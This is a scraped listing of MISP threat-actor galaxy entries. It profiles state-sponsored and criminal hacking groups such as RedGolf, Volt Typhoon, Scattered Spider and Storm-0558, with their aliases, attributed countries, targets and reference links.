Recorded Future’s Insikt Group has identified a large cluster of new operational infrastructure associated with the use of the custom Windows and Linux backdoor KEYPLUG. We attribute this activity to a threat activity group tracked as RedGolf, which is highly likely to be a Chinese state-sponsored group. RedGolf closely overlaps with threat activity reported in open sources under the aliases APT41/BARIUM and has likely carried out state-sponsored espionage activity in parallel with financially motivated operations for personal gain from at least 2014 onward.
Internal MISP references
UUID eff0c059-5449-4207-9860-715475139595
which can be used as unique global reference for RedGolf
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
cfr-suspected-state-sponsor | China |
cfr-target-category | ['Aviation', 'Automotive', 'Education', 'Intergovernmental', 'Media and Entertainment', 'Information Technology', 'Religious Organizations'] |
country | CN |
motive | state-sponsored espionage and financially motivated |
APT43
- APT43 is a prolific cyber operator that supports the interests of the North Korean regime. The group combines moderately sophisticated technical capabilities with aggressive social engineering tactics, especially against South Korean and U.S.-based government organizations, academics, and think tanks focused on Korean peninsula geopolitical issues.
- In addition to its espionage campaigns, we believe APT43 funds itself through cybercrime operations to support its primary mission of collecting strategic intelligence.
- The group creates numerous spoofed and fraudulent personas for use in social engineering, as well as cover identities for purchasing operational tooling and infrastructure.
- APT43 has collaborated with other North Korean espionage operators on multiple operations, underscoring the major role APT43 plays in the regime’s cyber apparatus.
Internal MISP references
UUID aac49b4e-74e9-49fa-84f9-e340cf8bafbc
which can be used as unique global reference for APT43
in MISP communities and other software using the MISP galaxy
Hagga
Hagga is believed to have been using Agent Tesla, 2021’s sixth most prevalent malware, to steal sensitive information from his victims since the latter part of 2021.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Hagga.
Known Synonyms |
---|
Aggah |
TH-157 |
Internal MISP references
UUID 1e318d85-79c7-4988-83b7-ff86a974786c
which can be used as unique global reference for Hagga
in MISP communities and other software using the MISP galaxy
External references
- https://www.team-cymru.com/post/an-analysis-of-infrastructure-linked-to-the-hagga-threat-actor - webarchive
- https://otx.alienvault.com/pulse/62cfe4ef3415be5f83be81d1 - webarchive
- https://team-cymru.com/blog/2022/07/12/an-analysis-of-infrastructure-linked-to-the-hagga-threat-actor/ - webarchive
- https://unit42.paloaltonetworks.com/aggah-campaign-bit-ly-blogspot-and-pastebin-used-for-c2-in-large-scale-campaign/ - webarchive
Volt Typhoon
[Microsoft] Volt Typhoon is a state-sponsored actor based in China that typically focuses on espionage and information gathering. Microsoft assesses with moderate confidence that this Volt Typhoon campaign is pursuing development of capabilities that could disrupt critical communications infrastructure between the United States and the Asia region during future crises.
[Secureworks] BRONZE SILHOUETTE likely operates on behalf of the PRC. The targeting of U.S. government and defense organizations for intelligence gain aligns with PRC requirements, and the tradecraft observed in these engagements overlaps with that of other state-sponsored Chinese threat groups.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Volt Typhoon.
Known Synonyms |
---|
BRONZE SILHOUETTE |
Dev-0391 |
Insidious Taurus |
Storm-0391 |
UNC3236 |
VANGUARD PANDA |
VOLTZITE |
Internal MISP references
UUID f02679fa-5e85-4050-8eb5-c2677d93306f
which can be used as unique global reference for Volt Typhoon
in MISP communities and other software using the MISP galaxy
External references
- https://www.secureworks.com/blog/chinese-cyberespionage-group-bronze-silhouette-targets-us-government-and-defense-organizations - webarchive
- https://www.microsoft.com/en-us/security/blog/2023/05/24/volt-typhoon-targets-us-critical-infrastructure-with-living-off-the-land-techniques/ - webarchive
- https://unit42.paloaltonetworks.com/volt-typhoon-threat-brief/ - webarchive
- https://www.dragos.com/threat/voltzite/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
country | CN |
SmugX
The campaign, called SmugX, overlaps with previously reported activity by the Chinese APT actors RedDelta and Mustang Panda. Although those two correlate to some extent with Camaro Dragon, there is insufficient evidence to link the SmugX campaign to the Camaro Dragon group.
The campaign uses new delivery methods, most notably HTML smuggling, to deploy a new variant of PlugX, an implant commonly associated with a wide variety of Chinese threat actors. Although the payload itself remains similar to the one found in older PlugX variants, its delivery methods result in low detection rates, which until recently helped the campaign fly under the radar.
Internal MISP references
UUID c95520c1-0a27-42aa-9853-bf5f0f3bc074
which can be used as unique global reference for SmugX
in MISP communities and other software using the MISP galaxy
RedDelta
RedDelta is a likely Chinese state-sponsored threat activity group targeting organizations within Europe and Southeast Asia using a customized variant of the PlugX backdoor. Since at least 2019, RedDelta has been consistently active within Southeast Asia, particularly in Myanmar and Vietnam, but has also routinely adapted its targeting in response to global geopolitical events. This is historically evident in the group’s targeting of the Vatican and other Catholic organizations in the lead-up to 2021 talks between Chinese Communist Party (CCP) and Vatican officials, as well as, throughout 2022, in the group’s shift towards increased targeting of European government and diplomatic entities following Russia’s invasion of Ukraine.
During the 3-month period from September through November 2022, RedDelta has regularly used an infection chain employing malicious shortcut (LNK) files, which trigger a dynamic-link library (DLL) search-order-hijacking execution chain to load consistently updated PlugX versions. Throughout this period, the group repeatedly employed decoy documents specific to government and migration policy within Europe. Of note, we identified a European government department focused on trade communicating with RedDelta command-and-control (C2) infrastructure in early August 2022. This activity commenced on the same day that a RedDelta PlugX sample using this C2 infrastructure and featuring an EU trade-themed decoy document surfaced on public malware repositories. We also identified additional probable victim entities within Myanmar and Vietnam regularly communicating with RedDelta C2 infrastructure.
RedDelta closely overlaps with public industry reporting under the aliases BRONZE PRESIDENT, Mustang Panda, TA416, Red Lich, and HoneyMyte.
Internal MISP references
UUID fceed509-938e-4f9e-acd4-76e6c28dc6f1
which can be used as unique global reference for RedDelta
in MISP communities and other software using the MISP galaxy
Worok
Worok is a cyber espionage group, mostly targeting Central Asia. The group toolset includes a C++ loader named CLRLoad, a PowerShell backdoor named PowHeartBeat, and a C# loader named PNGLoad.
Internal MISP references
UUID 77742419-aa71-4bc2-94c6-29c394b350e7
which can be used as unique global reference for Worok
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | China |
cfr-suspected-victims | ['East Asia', 'Central Asia', 'Southeast Asia', 'The Middle East', 'Southern Africa'] |
cfr-target-category | ['Government', 'Energy Company'] |
cfr-type-of-incident | Espionage |
country | CN |
MoustachedBouncer
MoustachedBouncer is a cyberespionage group discovered by ESET Research and first publicly disclosed in August 2023. The group has been active since at least 2014 and only targets foreign embassies in Belarus. Since 2020, MoustachedBouncer has most likely been able to perform adversary-in-the-middle (AitM) attacks at the ISP level, within Belarus, in order to compromise its targets. The group uses two separate toolsets that we have named NightClub and Disco.
Internal MISP references
UUID 01ac8b25-492e-444b-891b-968f2694e7b2
which can be used as unique global reference for MoustachedBouncer
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | Belarus |
cfr-suspected-victims | ['Europe', 'Eastern Europe', 'South Asia', 'Northeast Africa'] |
cfr-target-category | ['Government'] |
cfr-type-of-incident | Espionage |
country | BY |
Storm-0324
The threat actor that Microsoft tracks as Storm-0324 is a financially motivated group known to gain initial access using email-based initial infection vectors and then hand off access to compromised networks to other threat actors. These handoffs frequently lead to ransomware deployment.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Storm-0324.
Known Synonyms |
---|
DEV-0324 |
Sagrid |
TA543 |
Internal MISP references
UUID 8cb6f57b-9ebb-45a6-a89f-9efdb8065d70
which can be used as unique global reference for Storm-0324
in MISP communities and other software using the MISP galaxy
Scattered Canary
When the first member of Scattered Canary, who, for the purposes of this report, we call Alpha, began his operations, he was a lone wolf—working mostly Craigslist scams as he learned the tricks of the trade from a mentor. However, within a few years, he had honed his craft enough to expand into romance scams, where he met his first “employee,” Beta. Once they had secured enough mules via their romance scams to launder their stolen money, they shifted from targeting individuals to targeting enterprises, and the group’s BEC operation was born.
Internal MISP references
UUID fde2d0f9-ed23-4cdc-96d3-f0a01f804707
which can be used as unique global reference for Scattered Canary
in MISP communities and other software using the MISP galaxy
External references
- https://cofense.com/blog/gift-card-fraud-ecosystem-shifts-what-paxfuls-closing-means-for-business-email-compromise/ - webarchive
- https://static.fortra.com/agari/pdfs/guide/ag-scattered-canary-gd.pdf - webarchive
- https://www.agari.com/blog/covid-19-unemployment-fraud-cares-act?_gl=1%2Ayzg6ns%2A_ga%2AMTkyMzIyOTI4MC4xNjk2MjUyMDA2%2A_ga_NHMHGJWX49%2AMTY5NjI1MjAwNS4xLjAuMTY5NjI1MjAwNS42MC4wLjA.&utm_source=press-release&utm_medium=prnewswire&utm_campaign=scattered20 - webarchive
Associated metadata
Metadata key | Value |
---|---|
country | NG |
motive | Cybercrime |
Scattered Spider
Scattered Spider, a highly active hacking group, has made headlines by targeting more than 130 organizations, with the number of victims steadily increasing.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Scattered Spider.
Known Synonyms |
---|
0ktapus |
DEV-0971 |
Muddled Libra |
Octo Tempest |
Oktapus |
Scatter Swine |
Scattered Swine |
Starfraud |
Storm-0971 |
UNC3944 |
Internal MISP references
UUID 3b238f3a-c67a-4a9e-b474-dc3897e00129
which can be used as unique global reference for Scattered Spider
in MISP communities and other software using the MISP galaxy
External references
- https://www.cybersecurity-insiders.com/scattered-spider-managed-mgm-resort-network-outage-brings-8m-loss-daily/ - webarchive
- https://www.loginradius.com/blog/identity/oktapus-phishing-targets-okta-identity-credentials/ - webarchive
- https://www.attackiq.com/2023/11/21/attack-graph-response-to-cisa-advisory-aa23-320a/ - webarchive
- https://www.mandiant.com/resources/blog/unc3944-sms-phishing-sim-swapping-ransomware - webarchive
AtlasCross
NSFOCUS Security Labs recently discovered a new attack process based on phishing documents in their daily threat-hunting operations. Delving deeper into this finding through extensive research, they confirmed two new Trojan horse programs and many rare attack techniques and tactics. NSFOCUS Security Labs believes that this new attack process comes from a new APT attacker with a high technical level and a cautious attack attitude. The phishing attack activity captured this time is part of the attacker’s targeted strike on specific targets and is its main means of achieving in-domain penetration. NSFOCUS Security Labs validated the high-level threat attributes of AtlasCross in terms of development technology and attack strategy through an in-depth analysis of its attack metrics. At this stage, AtlasCross has a relatively limited scope of activity, primarily focusing on targeted attacks against specific hosts within a network domain. However, the attack processes it employs are highly robust and mature. NSFOCUS Security Labs deduces that this attacker is highly likely to deploy this attack process in larger-scale network attack operations.
Internal MISP references
UUID 32eebd31-5e0f-4fb9-b478-26ff4e48aaf4
which can be used as unique global reference for AtlasCross
in MISP communities and other software using the MISP galaxy
Void Rabisu
Void Rabisu is an intrusion set associated with both financially motivated ransomware attacks and targeted campaigns on Ukraine and countries supporting Ukraine.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Void Rabisu.
Known Synonyms |
---|
Tropical Scorpius |
Internal MISP references
UUID 9766d52e-0e5d-4997-9c31-7f2291dcda9e
which can be used as unique global reference for Void Rabisu
in MISP communities and other software using the MISP galaxy
cfr-suspected-victims | ['Ukraine', 'European Union'] |
Camaro Dragon
In early 2023, the Check Point Incident Response Team (CPIRT) investigated a malware incident at a European healthcare institution involving a set of tools mentioned in the Avast report in late 2022. The incident was attributed to Camaro Dragon, a China-based espionage threat actor whose activities overlap with those tracked by other researchers as Mustang Panda and LuminousMoth, and whose focus is primarily on Southeast Asian countries and their close peers.
Internal MISP references
UUID 9ee446fd-b0cd-4662-9cd1-a60b429192db
which can be used as unique global reference for Camaro Dragon
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
country | CN |
Storm-0558
Storm-0558 is a China-based threat actor with espionage objectives. While there are some minimal overlaps with other Chinese groups such as Violet Typhoon (ZIRCONIUM, APT31), Microsoft maintains high confidence that Storm-0558 operates as its own distinct group.
Internal MISP references
UUID 5b30bcb8-4923-45cc-bc89-29651ca5d54e
which can be used as unique global reference for Storm-0558
in MISP communities and other software using the MISP galaxy
External references
- https://www.microsoft.com/en-us/security/blog/2023/07/14/analysis-of-storm-0558-techniques-for-unauthorized-email-access/ - webarchive
- https://www.wiz.io/blog/storm-0558-compromised-microsoft-key-enables-authentication-of-countless-micr - webarchive
- https://msrc.microsoft.com/blog/2023/09/results-of-major-technical-investigations-for-storm-0558-key-acquisition/ - webarchive
- https://www.bsi.bund.de/DE/Themen/Unternehmen-und-Organisationen/Cyber-Sicherheitslage/Analysen-und-Prognosen/Threat-Intelligence/Aktive_APT-Gruppen/aktive-apt-gruppen_node.html - webarchive
- https://blogs.microsoft.com/on-the-issues/2023/07/11/mitigation-china-based-threat-actor/ - webarchive
- https://msrc.microsoft.com/blog/2023/07/microsoft-mitigates-china-based-threat-actor-storm-0558-targeting-of-customer-email/ - webarchive
- https://www.youtube.com/watch?v=khywfhJv4H8 - webarchive
- https://www.cisa.gov/sites/default/files/2024-04/CSRB_Review_of_the_Summer_2023_MEO_Intrusion_Final_508c.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | China |
cfr-suspected-victims | ['United States', 'Germany'] |
cfr-target-category | ['Government'] |
cfr-type-of-incident | Espionage |
country | CN |
Scarred Manticore
Scarred Manticore has been pursuing high-value targets for years, utilizing a variety of IIS-based backdoors to attack Windows servers. These include a variety of custom web shells, custom DLL backdoors, and driver-based implants.
Internal MISP references
UUID 79d0da59-9400-40f6-b72b-6c6f47354d59
which can be used as unique global reference for Scarred Manticore
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
country | IR |
Keksec
The threat group behind EnemyBot, Keksec, is well-resourced and has the ability to update and add new capabilities to its arsenal of malware on a daily basis.
Internal MISP references
UUID 39ef9941-4f9c-4807-ab10-88e863ce7953
which can be used as unique global reference for Keksec
in MISP communities and other software using the MISP galaxy
External references
- https://www.fortinet.com/blog/threat-research/enemybot-a-look-into-keksecs-latest-ddos-botnet - webarchive
- https://www.cybersecurity-insiders.com/rapidly-evolving-iot-malware-enemybot-now-targeting-content-management-system-servers-and-android-devices/?utm_source=rss&utm_medium=rss&utm_campaign=rapidly-evolving-iot-malware-enemybot-now-targeting-content-management-system-servers-and-android-devices - webarchive
- https://blog.netlab.360.com/necro-upgrades-again-using-tor-dynamic-domain-dga-and-aiming-at-both-windows-linux/ - webarchive
- https://blog.netlab.360.com/gafgtyt_tor-and-necro-are-on-the-move-again/ - webarchive
Xiaoqiying
Xiaoqiying is a primarily Chinese-speaking threat group that is best known for conducting website defacement and data exfiltration attacks on more than a dozen South Korean research and academic institutions in late January 2023. Research from Recorded Future’s Insikt Group has found that the group's affiliated threat actors have signaled a new round of cyberattacks against organizations in Japan and Taiwan. Although it shows no clear ties to the Chinese government, Xiaoqiying is staunchly pro-China and vows to target NATO countries as well as any country or region deemed hostile to China.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Xiaoqiying.
Known Synonyms |
---|
Genesis Day |
Teng Snake |
Internal MISP references
UUID 0ee7be4f-389f-4083-a1e4-4c39dc1ae105
which can be used as unique global reference for Xiaoqiying
in MISP communities and other software using the MISP galaxy
External references
- https://www.recordedfuture.com/xiaoqiying-genesis-day-threat-actor-group-targets-south-korea-taiwan - webarchive
- https://medium.com/s2wblog/%E5%8F%98%E8%84%B8-teng-snake-a-k-a-code-core-8c35268b4d1a - webarchive
- https://therecord.media/samsung-investigating-claims-of-hack-on-south-korea-systems-internal-employee-platform/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
country | CN |
Winter Vivern
Winter Vivern is a cyberespionage group first revealed by DomainTools in 2021. It is thought to have been active since at least 2020 and it targets governments in Europe and Central Asia. To compromise its targets, the group uses malicious documents, phishing websites, and a custom PowerShell backdoor.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Winter Vivern.
Known Synonyms |
---|
TA-473 |
TA473 |
TAG-70 |
UAC-0114 |
Internal MISP references
UUID b7497d28-02de-4722-8b97-1fc53e1d1b68
which can be used as unique global reference for Winter Vivern
in MISP communities and other software using the MISP galaxy
External references
- https://www.sentinelone.com/labs/winter-vivern-uncovering-a-wave-of-global-espionage/ - webarchive
- https://www.domaintools.com/resources/blog/winter-vivern-a-look-at-re-crafted-government-maldocs - webarchive
- https://www.welivesecurity.com/en/eset-research/winter-vivern-exploits-zero-day-vulnerability-roundcube-webmail-servers/ - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/exploitation-dish-best-served-cold-winter-vivern-uses-known-zimbra-vulnerability - webarchive
- https://socprime.com/blog/uac-0114-group-aka-winter-vivern-attack-detection-hackers-launch-malicious-phishing-campaigns-targeting-government-entities-of-ukraine-and-poland/ - webarchive
- https://cybersecuritynews.com/russian-hackers-xss-flaw/ - webarchive
- https://www.recordedfuture.com/russia-aligned-tag-70-targets-european-government-and-military-mail - webarchive
- https://www.bsi.bund.de/DE/Themen/Unternehmen-und-Organisationen/Cyber-Sicherheitslage/Analysen-und-Prognosen/Threat-Intelligence/Aktive_APT-Gruppen/aktive-apt-gruppen_node.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
cfr-suspected-victims | ['Germany'] |
country | RU |
UNC3886
UNC3886 is an advanced cyber espionage group with unique capabilities in how it operates on-network as well as in the tools it uses in its campaigns. UNC3886 has been observed targeting firewall and virtualization technologies that lack EDR support. Its ability to manipulate firewall firmware and exploit a zero-day indicates that it has developed a deeper level of understanding of such technologies. UNC3886 has modified publicly available malware, specifically targeting *nix operating systems.
Internal MISP references
UUID 8c08dbe7-3ed0-4d7d-b315-22d8774a5bd9
which can be used as unique global reference for UNC3886
in MISP communities and other software using the MISP galaxy
External references
- https://www.mandiant.com/resources/blog/fortinet-malware-ecosystem - webarchive
- https://www.mandiant.com/resources/blog/esxi-hypervisors-malware-persistence - webarchive
- https://www.mandiant.com/resources/blog/vmware-esxi-zero-day-bypass - webarchive
- https://www.mandiant.com/resources/blog/vmware-detection-containment-hardening - webarchive
Associated metadata
Metadata key | Value |
---|---|
country | CN |
Earth Longzhi
Earth Longzhi is a subgroup of APT41 targeting organizations based in Taiwan, Thailand, the Philippines, and Fiji, and using “stack rumbling” via Image File Execution Options (IFEO), a new denial-of-service (DoS) technique to disable security software.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Earth Longzhi.
Known Synonyms |
---|
SnakeCharmer |
Internal MISP references
UUID b21dbf83-3459-44f4-b91b-6157379e430a
which can be used as unique global reference for Earth Longzhi
in MISP communities and other software using the MISP galaxy
External references
- https://www.picussecurity.com/resource/blog/cyber-threat-intelligence-report-may-2023 - webarchive
- https://www.trendmicro.com/en_us/research/23/e/attack-on-security-titans-earth-longzhi-returns-with-new-tricks.html - webarchive
- https://ics-cert.kaspersky.com/publications/reports/2023/03/24/apt-attacks-on-industrial-organizations-in-h2-2022/ - webarchive
- https://www.trendmicro.com/en_us/research/22/k/hack-the-real-box-apt41-new-subgroup-earth-longzhi.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
Redfly
Redfly hacked a national electricity grid organization in Asia and maintained persistent access to the network for about six months. Researchers discovered evidence for this attack between 28 February and 3 August 2023 after noticing suspicious malware activity within the organization’s network.
Internal MISP references
UUID 4f1c43a4-3788-4035-a99c-e510f89edd0f
which can be used as unique global reference for Redfly
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
TetrisPhantom
TetrisPhantom relies on compromising a certain type of secure USB drive that provides hardware encryption and is commonly used by government organizations. While investigating this threat, experts identified an entire spying campaign that uses a range of malicious modules to execute commands, collect files and information from compromised computers, and transfer them to other machines, also using secure USB drives.
Internal MISP references
UUID 5368c0a2-eb79-420c-b808-85ae719efccd
which can be used as unique global reference for TetrisPhantom
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Earth Estries
Trend Micro found that Earth Estries relies heavily on DLL sideloading to load various tools within its arsenal. Aside from the backdoors previously mentioned, this intrusion set also utilizes commonly used remote control tools like Cobalt Strike, PlugX, or Meterpreter stagers interchangeably in various attack stages. These tools come as encrypted payloads loaded by custom loader DLLs.
Internal MISP references
UUID 1f7f4a51-c4a8-4365-ade3-83b222e7cb67
which can be used as unique global reference for Earth Estries
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
GoldenJackal
GoldenJackal activity is characterized by the use of compromised WordPress websites as a method to host C2-related logic. Kaspersky believes the attackers upload a malicious PHP file that is used as a relay to forward web requests to another backbone C2 server. They developed a collection of .NET malware tools known as Jackal.
Internal MISP references
UUID 8e93e09a-734d-4b16-933f-9feb58f6ce7d
which can be used as unique global reference for GoldenJackal
in MISP communities and other software using the MISP galaxy
External references
- https://securelist.com/it-threat-evolution-q2-2023/110355/ - webarchive
- https://securelist.com/goldenjackal-apt-group/109677/ - webarchive
- https://www.bsi.bund.de/DE/Themen/Unternehmen-und-Organisationen/Cyber-Sicherheitslage/Analysen-und-Prognosen/Threat-Intelligence/Aktive_APT-Gruppen/aktive-apt-gruppen_node.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
cfr-suspected-victims | ['Germany'] |
Lancefly
Lancefly targets government, aviation, and telecom organizations in South and Southeast Asia. They use a custom backdoor named Merdoor, developed since 2018, and employ various tactics to gain access, including phishing emails, SSH credential brute-forcing, and exploiting server vulnerabilities. Additionally, Lancefly has been observed using a newer version of the ZXShell rootkit and tools like PlugX and ShadowPad RAT, which are typically associated with Chinese-speaking APT groups.
Internal MISP references
UUID 2ceeab57-85e3-468b-a1b8-c035c496dcdc
which can be used as unique global reference for Lancefly
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
LofyGang
LofyGang has been found to be linked to more than 200 malicious packages, with thousands of installations throughout 2022. The group, believed to have been operating for more than a year, has multiple hacking objectives, including stealing credit card information and stealing user accounts, among them Discord Inc. premium accounts, streaming service accounts such as Disney+, and Minecraft accounts.
Internal MISP references
UUID a47b0f97-30fe-451d-9983-3bdc1e4608ab
which can be used as unique global reference for LofyGang
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Storm-0062
The cyberattack campaign that Microsoft uncovered was launched by a China-linked hacking group called Storm-0062. According to the company, the group is launching cyberattacks by exploiting a vulnerability in the Data Center and Server editions of Confluence. Those are versions of the application that companies run on-premises.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Storm-0062.
Known Synonyms |
---|
DarkShadow |
Oro0lxy |
Internal MISP references
UUID d1fe4546-616a-409c-8d2c-f7a7e0a183f8
which can be used as unique global reference for Storm-0062
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | CN |
SparklingGoblin
ESET researchers have discovered a new undocumented modular backdoor, SideWalk, being used by an APT group they’ve named SparklingGoblin; this backdoor was used during one of SparklingGoblin’s recent campaigns that targeted a computer retail company based in the USA. This backdoor shares multiple similarities with another backdoor used by the group: CROSSWALK.
Internal MISP references
UUID f3fd4397-19e4-47e0-b1bc-f792690e3bd0
which can be used as unique global reference for SparklingGoblin
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Kasablanka
The Kasablanka group is a cyber-criminal organization that specifically targeted Russia between September and December 2022, using various payloads delivered through phishing emails containing socially engineered LNK files, ZIP packages, and executables attached to virtual disk image files.
Internal MISP references
UUID 6db3ad41-6b47-43c8-b94b-98853749ee02
which can be used as unique global reference for Kasablanka
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | MA |
YoroTrooper
YoroTrooper’s main targets are government or energy organizations in Azerbaijan, Tajikistan, Kyrgyzstan and other Commonwealth of Independent States members, based on Cisco Talos analysis. YoroTrooper was also observed compromising accounts from at least two international organizations: a critical European Union health care agency and the World Intellectual Property Organization. Successful compromises also included Embassies of European countries including Azerbaijan and Turkmenistan.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular YoroTrooper.
Known Synonyms |
---|
Salted Earth |
Sturgeon Fisher |
Internal MISP references
UUID 2031ae01-e962-4861-a224-0934af6cdd3a
which can be used as unique global reference for YoroTrooper
in MISP communities and other software using the MISP galaxy
External references
- https://blog.talosintelligence.com/attributing-yorotrooper/ - webarchive
- https://blog.talosintelligence.com/yorotrooper-espionage-campaign-cis-turkey-europe/ - webarchive
- https://www.bsi.bund.de/DE/Themen/Unternehmen-und-Organisationen/Cyber-Sicherheitslage/Analysen-und-Prognosen/Threat-Intelligence/Aktive_APT-Gruppen/aktive-apt-gruppen_node.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
cfr-suspected-victims | ['Germany'] |
country | KZ |
Metador
Metador primarily targets telecommunications, internet service providers, and universities in several countries in the Middle East and Africa. Metador’s attack chains are designed to bypass native security solutions while deploying malware platforms directly into memory. SentinelLabs researchers discovered variants of two long-standing Windows malware platforms, and indications of an additional Linux implant.
Internal MISP references
UUID 5d22315b-55ef-4d8a-86aa-00ba38057641
which can be used as unique global reference for Metador
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
SiegedSec
SiegedSec, a hacktivist collective, emerged coincidentally just days before Russia’s invasion of Ukraine. Under the leadership of the hacktivist known as “YourAnonWolf,” the group swiftly gained strength, announcing an increasing number of victims after its inception. The group humorously self-identifies as “gay furry hackers” and is renowned for its comical slogans and the use of vulgar language. SiegedSec has affiliations with other hacker groups like GhostSec and typically consists of members aged between 18 and 26.
Internal MISP references
UUID 3c2f534a-a898-4af6-b3e8-f2740c473de0
which can be used as unique global reference for SiegedSec
in MISP communities and other software using the MISP galaxy
External references
- https://therecord.media/nato-siegedsec-unclassified-websites-alleged-cyberattack - webarchive
- https://socradar.io/threat-actor-profile-siegedsec/ - webarchive
- https://socradar.io/the-five-families-hacker-collaboration-redefining-the-game/ - webarchive
- https://therecord.media/fort-worth-officials-say-leaked-data-was-public - webarchive
- https://webz.io/dwp/exclusive-hacktivists-attack-anti-abortion-u-s-states/ - webarchive
- https://www.darkowl.com/blog-content/darkowl-threat-actor-spotlight-siegedsec-and-leaked-data/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
RansomVC
Ransomed.VC burst onto the scene with a well-orchestrated PR campaign, encompassing a clearnet site and multiple communication channels including Telegram and Twitter/X profiles. Their operations are heavily inclined towards exploiting GDPR penalties as a method of extortion, threatening victims with potential legal repercussions in case of data leaks.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular RansomVC.
Known Synonyms |
---|
Ransomed.vc |
Internal MISP references
UUID f939b51d-32f9-41d9-8549-f00b2db104c7
which can be used as unique global reference for RansomVC
in MISP communities and other software using the MISP galaxy
External references
- https://therecord.media/colonial-pipeline-attributes-ransomware-claims-to-unrelated-third-party-breach - webarchive
- https://socradar.io/on-the-horizon-ransomed-vc-ransomware-group-spotted-in-the-wild/ - webarchive
- https://www.sentinelone.com/blog/sep-2023-cybercrime-update-new-ransomware-threats-and-the-rising-menace-of-telegram/ - webarchive
- https://socradar.io/unmasking-usdod-the-enigma-of-the-cyber-realm/ - webarchive
- https://www.videogameschronicle.com/news/a-ransomware-group-claims-to-have-beached-all-sony-systems/ - webarchive
- https://securityaffairs.com/151550/data-breach/ransomed-vc-sony-ntt-alleged-attacks.html - webarchive
- https://blog.talosintelligence.com/threat-source-newsletter-sept-28-2023/ - webarchive
- https://www.resecurity.com/blog/article/ransomedvc-in-the-spotlight-what-we-know-about-the-ransomware-group-targeting-major-japanese-businesses - webarchive
Associated metadata
Metadata key | Value |
---|---|
Carderbee
Symantec recently reported on activity attributed to a threat actor group dubbed Carderbee. In the campaign, the threat actors target entities in Hong Kong and other regions of Asia via a supply chain attack leveraging the legitimate Cobra DocGuard software. The activity began as early as September 2022.
Internal MISP references
UUID ce793b99-0cf2-4148-831c-ea5f6a9e0a76
which can be used as unique global reference for Carderbee
in MISP communities and other software using the MISP galaxy
External references
- https://blog.eclecticiq.com/chinese-state-sponsored-cyber-espionage-activity-targeting-semiconductor-industry-in-east-asia - webarchive
- https://blog.polyswarm.io/carderbee-targets-hong-kong-in-supply-chain-attack - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/carderbee-software-supply-chain-certificate-abuse - webarchive
Associated metadata
Metadata key | Value |
---|---|
UNC3890
A suspected Iranian threat activity cluster has been linked to attacks aimed at Israeli shipping, government, energy, and healthcare organizations, in a campaign stretching back to late 2020. Researchers believe that the data harvested during the campaign could be used to support various activities. UNC3890, the threat actor behind the attacks, deployed two proprietary pieces of malware – a backdoor named “SUGARUSH” and a browser credential stealer called “SUGARDUMP”, which exfiltrates password information to email addresses registered with Gmail, ProtonMail, Yahoo and Yandex email services. The threat actor also employs a network of C&C servers that host fake login pages impersonating legitimate platforms such as Office 365, LinkedIn and Facebook. These servers are designed to communicate with the targets and also with a watering hole hosted on the login page of a legitimate Israeli shipping company.
Internal MISP references
UUID 27e11cc5-1688-4aea-a98d-96e6c275d005
which can be used as unique global reference for UNC3890
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | IR |
RedStinger
In October 2022, Kaspersky identified an active infection of government, agriculture and transportation organizations located in the Donetsk, Lugansk, and Crimea regions. Although the initial vector of compromise is unclear, the details of the next stage imply the use of spear phishing or similar methods. The victims navigated to a URL pointing to a ZIP archive hosted on a malicious web server.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular RedStinger.
Known Synonyms |
---|
Bad Magic |
Internal MISP references
UUID b813c6a2-f8c7-4071-83bd-24c181ff2bd4
which can be used as unique global reference for RedStinger
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Witchetty
